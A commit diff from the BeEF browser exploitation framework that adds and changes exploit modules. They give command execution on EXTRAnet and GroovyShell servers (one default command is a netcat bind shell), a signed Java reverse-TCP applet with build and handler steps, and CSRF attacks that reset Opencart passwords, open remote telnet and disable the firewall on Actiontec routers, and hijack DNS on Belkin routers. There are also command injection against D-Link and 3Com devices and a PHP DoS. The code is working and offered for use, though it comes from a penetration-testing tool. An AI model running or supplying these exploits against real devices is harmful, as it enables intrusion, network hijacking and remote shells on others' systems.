# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
extract_cmd_exec:
enable: true
category: "Exploits"
name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["IE"]

30
modules/exploits/extract_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
###
# EXTRAnet Collaboration Tool (extra-ct)
# Version: 0.5.1
# Homepage: http://www.extra-ct.net/
# Source: http://code.google.com/p/extra-ct/
# Source: http://sourceforge.net/projects/extract/
###
class Extract_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end

43
modules/exploits/groovyshell_server_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
// validate target details
if (!rport || !rhost || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
return;
}
if (rport > 65535 || rport < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
return;
}
// send commands
var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
// clean up
cleanup = function() {
document.body.removeChild(groovy_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

16
modules/exploits/groovyshell_server_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
groovyshell_server_command_execution:
enable: true
category: "Exploits"
name: "GroovyShell Server Command Execution"
description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
authors: ["bcoles"]
target:
working: ["FF", "C"]
not_working: ["IE"]

22
modules/exploits/groovyshell_server_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,22 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Groovyshell_server_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
end
end

BIN
modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
View File

Binary file not shown.

BIN
modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
View File

Binary file not shown.

BIN
modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar Normal file
View File

Binary file not shown.

50
modules/exploits/local_host/java_payload/README.txt Normal file
View File

@@ -0,0 +1,50 @@
--- How to use this module ---
The following is how you compile the JavaPayload handlers :
$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
$cd .. && ant compile && ant jar
$cd build/bin
$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
At this point you have the applet ready to go, with a reverseTCP handler:
Applet_ReverseTCP.jar
Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
with Java 6 to run it on those versions too - SUGGESTED :-).
At this stage you need to sign the applet.
The following is to create a self-signed certificate and then sign it.
Obviously if you have a valid code signing certificate, even better ;)
keytool -keystore tmp -genkey
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
Now launch the BeEF module.
If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
! help
help: show information about commands.
Usage: help [command]
Supported commands:
help - show this help
info - list system properties
pwd - show current directory
cd - change directory
ls - list directory
exec - execute native command
cat - show text file
wget - download file
telnet - create TCP connection
paste - create text file
jobs - list or continue jobs
exit - Exit JSh
When inside an interactive command, enter ~. on a new
line to exit from that command. Enter ~& to background the command.
Enter ~~ to start a line with a ~ character

1
modules/exploits/local_host/java_payload/config.yaml
View File

@@ -12,5 +12,4 @@ beef:
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported." description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
authors: ["antisnatchor"] authors: ["antisnatchor"]
target: target:
not_working: ["FF"]
user_notify: ["All"] user_notify: ["All"]

2
modules/exploits/local_host/java_payload/module.rb
View File

@@ -6,7 +6,7 @@
class Java_payload < BeEF::Core::Command class Java_payload < BeEF::Core::Command
def pre_send def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
end end
def self.options def self.options

27
modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,27 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var path = '/cgi-bin/system_mgr.cgi';
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var timeout = 15;
var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
{'type':'hidden', 'name':'cmd', 'value':'cgi_sms_test'},
{'type':'hidden', 'name':'command1', 'value':cmd}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

15
modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
dlink_sharecenter_cmd_exec:
enable: true
category: ["Exploits", "NAS"]
name: "D-Link ShareCenter Command Execution"
description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
target:
working: ["ALL"]

23
modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb Normal file
View File

@@ -0,0 +1,23 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# This module has not been tested. For more information see:
# http://blog.emaze.net/2012_02_01_archive.html
# http://www.securityfocus.com/archive/1/521532
###
class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
{'name'=>'cmd', 'ui_label'=>'Command', 'value'=>'ls'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

13
modules/exploits/zenoss_daemon_csrf/command.js → modules/exploits/opencart_reset_password/command.js
View File

@@ -5,17 +5,18 @@
// //
beef.execute(function() { beef.execute(function() {
var base = '<%= @base %>'; var base = '<%= @base %>';
var service = '<%= @service %>'; var password = '<%= @password %>';
var action = '<%= @action %>';
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe(); var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action); {'type':'hidden', 'name':'password', 'value':password},
{'type':'hidden', 'name':'confirm', 'value':password}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() { cleanup = function() {
document.body.removeChild(zenoss_daemon_iframe); document.body.removeChild(opencart_reset_password_iframe);
} }
setTimeout("cleanup()", 15000); setTimeout("cleanup()", 15000);

15
modules/exploits/opencart_reset_password/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
opencart_reset_password:
enable: true
category: "Exploits"
name: "Opencart Reset Password CSRF"
description: "Attempts to reset an Opencart user's password."
authors: ["Saadat Ullah", "bcoles"]
target:
unknown: ["ALL"]

20
modules/exploits/opencart_reset_password/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# This module has not been tested
class Opencart_reset_password < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

8
modules/exploits/php-5.3.9-dos/command.js
View File

@@ -32,7 +32,7 @@ function serializeObj (obj) {
} }
// Run attack // Run attack
function attackSite (target_url) { function php_dos (target_url) {
var bad = serializeObj(createEvilObj()); var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
xhr.open("POST", target_url, true); xhr.open("POST", target_url, true);
@@ -42,10 +42,10 @@ function attackSite (target_url) {
} }
try { try {
attackSite("<%= @url %>"); php_dos("<%= @url %>");
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent"); beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
} catch (e) { } catch (e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString()); beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
} }
}); });

3
modules/exploits/php-5.3.9-dos/module.rb
View File

@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
def post_execute def post_execute
content = {} content = {}
content['result'] = @datastore['result'] content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
save content save content
end end

4
modules/exploits/qnx_qconn_command_execution/command.js
View File

@@ -30,12 +30,12 @@ beef.execute(function() {
} }
// send commands // send commands
var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload); var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
// clean up // clean up
cleanup = function() { cleanup = function() {
document.body.removeChild(qnx_iframe); document.body.removeChild(qnx_iframe_<%= @command_id %>);
} }
setTimeout("cleanup()", timeout*1000); setTimeout("cleanup()", timeout*1000);

7
modules/exploits/router/3com_officeconnect_cmd_exec/command.js
View File

@@ -9,8 +9,9 @@ beef.execute(function() {
var gateway = '<%= @base %>'; var gateway = '<%= @base %>';
var path = 'utility.cgi'; var path = 'utility.cgi';
var cmd = '<%= @cmd %>'; var cmd = '<%= @cmd %>';
var timeout = 15;
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
{'type':'hidden', 'name':'testType', 'value':'1'}, {'type':'hidden', 'name':'testType', 'value':'1'},
{'type':'hidden', 'name':'IP', 'value':'||'+cmd} {'type':'hidden', 'name':'IP', 'value':'||'+cmd}
]); ]);
@@ -18,9 +19,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() { cleanup = function() {
document.body.removeChild(com_officeconnect_iframe); document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
} }
setTimeout("cleanup()", 15000); setTimeout("cleanup()", timeout*1000);
}); });

52
modules/exploits/router/actiontec_q1000_csrf/command.js Normal file
View File

@@ -0,0 +1,52 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var user = '<%= @user %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var timeout = 15;
var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
{'type':'hidden', 'name':'serCtlHttp', 'value':'1'},
{'type':'hidden', 'name':'adminUserName', 'value':user},
{'type':'hidden', 'name':'adminPassword', 'value':passwd},
{'type':'hidden', 'name':'remGuiTimeout', 'value':'0'},
{'type':'hidden', 'name':'remGuiPort', 'value':port}
]);
var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
{'type':'hidden', 'name':'serCtlTelnet', 'value':'1'},
{'type':'hidden', 'name':'remTelUser', 'value':user},
{'type':'hidden', 'name':'remTelPass', 'value':passwd},
{'type':'hidden', 'name':'remTelTimeout', 'value':'0'},
{'type':'hidden', 'name':'remTelPassChanged', 'value':'1'}
]);
var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
{'type':'hidden', 'name':'fwLevel', 'value':'Basic'},
{'type':'hidden', 'name':'fwStealthMode', 'value':'0'}
]);
var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
{'type':'hidden', 'name':'ipv6_fwlevel', 'value':'basic'},
{'type':'hidden', 'name':'ipv6_fwenable', 'value':'0'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

15
modules/exploits/router/actiontec_q1000_csrf/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
actiontec_q1000_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Actiontec Q1000 CSRF"
description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
authors: ["james-otten"]
target:
working: ["ALL"]

21
modules/exploits/router/actiontec_q1000_csrf/module.rb Normal file
View File

@@ -0,0 +1,21 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Actiontec_q1000_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

2
modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
View File

@@ -14,7 +14,7 @@ beef.execute(function() {
img.setAttribute("style","visibility:hidden"); img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0"); img.setAttribute("width","0");
img.setAttribute("height","0"); img.setAttribute("height","0");
img.id = 'asmax_ar804gu'; img.id = 'asmax_ar804gu_<%= @command_id %>';
img.src = gateway+path+cmd; img.src = gateway+path+cmd;
document.body.appendChild(img); document.body.appendChild(img);

70
modules/exploits/router/belkin_dns_csrf/command.js Normal file
View File

@@ -0,0 +1,70 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var gateway = '<%= @base %>';
var path = '/cgi-bin/setup_dns.exe';
var dns = '<%= @dns %>';
var timeout = 15;
// validate DNS server IP address
var parts = dns.split('.');
if (parts.length != 4) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
return;
}
for (var i=0; i<parts.length; i++) {
var part = parts[i];
if (isNaN(part) || part < 0 || part > 255) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
return;
}
}
var dns_1 = parts[0];
var dns_2 = parts[1];
var dns_3 = parts[2];
var dns_4 = parts[3];
// attempt auth with default password (admin)
// incorrect login attempts do not log out an authenticated session
var img = new Image();
img.setAttribute("style", "visibility:hidden");
img.setAttribute("width", "0");
img.setAttribute("height","0");
img.id = 'belkin_auth_<%= @command_id %>';
img.src = gateway+"/cgi-bin/login.exe?pws=admin";
document.body.appendChild(img);
// change DNS
var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
{'type':'hidden', 'name':'dns1_1', 'value':dns_1},
{'type':'hidden', 'name':'dns1_2', 'value':dns_2},
{'type':'hidden', 'name':'dns1_3', 'value':dns_3},
{'type':'hidden', 'name':'dns1_4', 'value':dns_4},
{'type':'hidden', 'name':'dns2_1', 'value':dns_1},
{'type':'hidden', 'name':'dns2_2', 'value':dns_2},
{'type':'hidden', 'name':'dns2_3', 'value':dns_3},
{'type':'hidden', 'name':'dns2_4', 'value':dns_4},
{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
// clean up
cleanup = function() {
document.body.removeChild(belkin_iframe_<%= @command_id %>);
document.body.removeChild(belkin_auth_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

15
modules/exploits/router/belkin_dns_csrf/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
belkin_dns_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Belkin DNS Hijack CSRF"
description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
authors: ["bcoles"]
target:
unknown: ["ALL"]

Some files were not shown because too many files have changed in this diff Show More